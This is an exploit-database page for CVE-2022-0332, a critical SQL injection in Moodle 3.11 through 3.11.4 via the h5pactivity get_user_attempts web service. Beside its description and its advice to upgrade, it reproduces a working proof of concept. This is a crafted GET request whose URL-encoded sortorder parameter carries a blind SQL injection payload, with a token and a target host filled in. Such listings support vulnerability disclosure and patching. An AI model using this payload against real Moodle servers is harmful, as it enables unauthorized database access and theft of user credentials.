header-logo
Suggest Exploit
vendor:
Moodle
by:
lavclash75
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Moodle
Affected Version From: Moodle 3.11
Affected Version To: Moodle 3.11.4
Patch Exists: YES
Related CWE: CVE-2022-0332
CPE: a:moodle:moodle:3.11.4
Metasploit: https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2021-44142/https://www.rapid7.com/db/vulnerabilities/moodle-cve-2022-0332/
Other Scripts:
Platforms Tested:
2022

Moodle 3.11.4 – SQL Injection

Moodle 3.11.4 is vulnerable to a SQL injection vulnerability due to insufficient input validation in the mod/h5pactivity/classes/external/get_user_attempts.php script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the server, which can be used to execute arbitrary SQL commands on the underlying database. This can be used to gain access to sensitive information, such as user credentials, or to modify the database in any way.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Moodle to ensure that they are protected.
Source

Exploit-DB raw data:

# Exploit Title: Moodle 3.11.4  - SQL Injection
# Date: 30/01/2022
# Exploit Author: lavclash75
# Vendor Homepage: https://moodle.org/
# Version: Moodle 3.11 to 3.11.4
# CVE: CVE-2022-0332
# POC

```
GET /moodle-3.11.4/webservice/rest/server.php?wstoken=98f7d8003180afbd46ee160fdc05a4fc&wsfunction=mod_h5pactivity_get_user_attempts&moodlewsrestformat=json&h5pactivityid=1&sortorder=%28SELECT%20%28CASE%20WHEN%20%28ORD%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20NCHAR%29%2C0x20%29%29%2C4%2C1%29%29%3E104%29%20THEN%20%27%27%20ELSE%20%28SELECT%205080%20UNION%20SELECT%204100%29%20END%29%29 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0
Host: local.numanturle.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

```

```

```

![PHP](img/orderby.jpg?raw=true "PHP")
![PHP](img/uri.jpg?raw=true "PHP")
![PHP](img/sqlmap.jpg?raw=true "PHP")

# Reference
 * [CVE-2022-0332](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0332)
 * [Git](https://git.moodle.org/gw?p=moodle.git;a=blobdiff;f=mod/h5pactivity/classes/external/get_user_attempts.php;h=8a27f821bc37f20bafaba6ef436871717b3817a3;hp=216653e93315c4d8ca084fe1e62b2041dece4531;hb=c7a62a8c82219b50589257f79021da1df1a76808;hpb=2ee27313cea0d7073f5a6a35eccdfddcb3a9adad)

Navigation

Suggest Exploit

Services By CQR